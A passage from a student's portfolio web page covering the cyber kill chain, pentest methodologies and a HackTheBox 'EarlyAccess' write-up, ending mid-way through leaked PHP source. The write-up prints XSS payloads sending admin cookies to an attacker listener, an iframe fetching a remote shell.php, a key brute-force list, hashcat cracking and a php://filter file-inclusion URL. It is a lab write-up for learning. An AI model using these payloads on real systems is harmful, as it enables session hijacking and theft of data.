          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
